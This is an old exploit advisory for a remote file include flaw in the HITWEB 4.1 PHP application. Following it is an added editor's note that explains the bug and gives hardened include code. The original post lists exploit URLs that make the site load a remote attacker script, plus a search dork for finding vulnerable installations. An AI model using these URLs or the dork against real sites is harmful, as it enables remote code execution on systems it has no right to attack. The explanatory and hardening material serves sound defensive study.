From: x_w0x <x_w0x_(at)_hotmail.com>
Date: 31.10.2006
Subject: HITWEB Remote File Include

#################################
# HITWEB 4.1                                 #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
#site:http://www.hitweb.org/
# Site Download: http://www.lbb.org/cgi-bin/script/telecharger.cgi?ID=2919 #
# Author:    x_w0x
# Contact:   x_w0x@hotmail.com
###################################
#Vuln Code
=================addlink.php3================

include "$REP_CLASS/template.inc"
include "$REP_CLASS/class.http_storage".$EXT_PHP ;

include "$REP_CLASS/class.hitweb".$EXT_PHP ;
include "admin/$REP_LANG_ADMIN/$LANG_ADMIN".
include "$REP_INC/lib_database.php3"

==============appreciation.php3===============

include "$REP_CLASS/template.inc"

==============genpage.php3================

include "$REP_INC/lib_database.php3"

============refererpoint.php3================

include "$REP_CLASS/template.inc" #

####################################

£xploit:

http://www.victim.com/[path]/addlink.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/genpage.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/refererpoint.php3?REP_CLASS=http://DarknesseScript.txt

######

#Dork : "Copyright © 1998 - 2004 Brian FRAVAL"


#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0k, and elite-team
=========================
#w£lc0m£ In x0|0x
#by x_w0x
############################################################
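Editor's note, added example (not part of the original post and not HITWEB's own code): the includes quoted above use $REP_CLASS, $REP_INC and $EXT_PHP before anything in those files assigns them. With PHP's register_globals enabled (still common on PHP 4 hosts in 2006), every request parameter becomes a global variable, so ?REP_CLASS=http://attacker/x.txt sets $REP_CLASS and include "$REP_CLASS/template.inc" fetches and executes the attacker's file, because include accepts URLs whenever allow_url_fopen (PHP < 5.2) or allow_url_include (PHP >= 5.2) is on. The block below shows the vulnerable pattern next to a hardened version. The directory layout, the safe_include() helper and its parameters are assumptions for illustration, and the hardened code targets PHP 7+ syntax rather than the PHP 3/4 the application was written for.

```php
<?php
// Added example, not HITWEB code. Demonstrates the remote file include
// described above and one way to harden the include calls.

// --- vulnerable pattern (as quoted from addlink.php3) ---
// $REP_CLASS is never assigned here; under register_globals=On it is taken
// straight from the query string, e.g. ?REP_CLASS=http://attacker/x.txt
//
//   include "$REP_CLASS/template.inc";
//   include "$REP_CLASS/class.http_storage".$EXT_PHP;

// --- hardened pattern ---

// 1. Never let request data name an include path: assign the configuration
//    variables explicitly (assumed directory names, not HITWEB's real layout).
$REP_CLASS = __DIR__ . '/class';
$EXT_PHP   = '.php3';

// 2. Resolve the target and prove it stays inside the expected directory
//    before handing it to include/require.
function safe_include(string $base, string $file): string
{
    // Reject stream wrappers (http://, ftp://, php://, data:, ...) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $file) || strpos($file, "\0") !== false) {
        throw new RuntimeException("Refusing non-local include target: $file");
    }

    $baseReal = realpath($base);
    $full     = realpath($base . '/' . $file);

    // realpath() collapses "..", so a traversal attempt either fails to
    // resolve or resolves outside $baseReal; both cases are rejected.
    if ($baseReal === false || $full === false
        || strncmp($full, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        throw new RuntimeException("Include target escapes $base: $file");
    }
    return $full;
}

require safe_include($REP_CLASS, 'template.inc');
require safe_include($REP_CLASS, 'class.http_storage' . $EXT_PHP);
```

The code-level fix is only half of it: on the server, set register_globals=Off (and allow_url_include=Off on PHP 5.2 or later) so that even an include that is still built from an unvalidated variable cannot be pointed at a remote URL.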
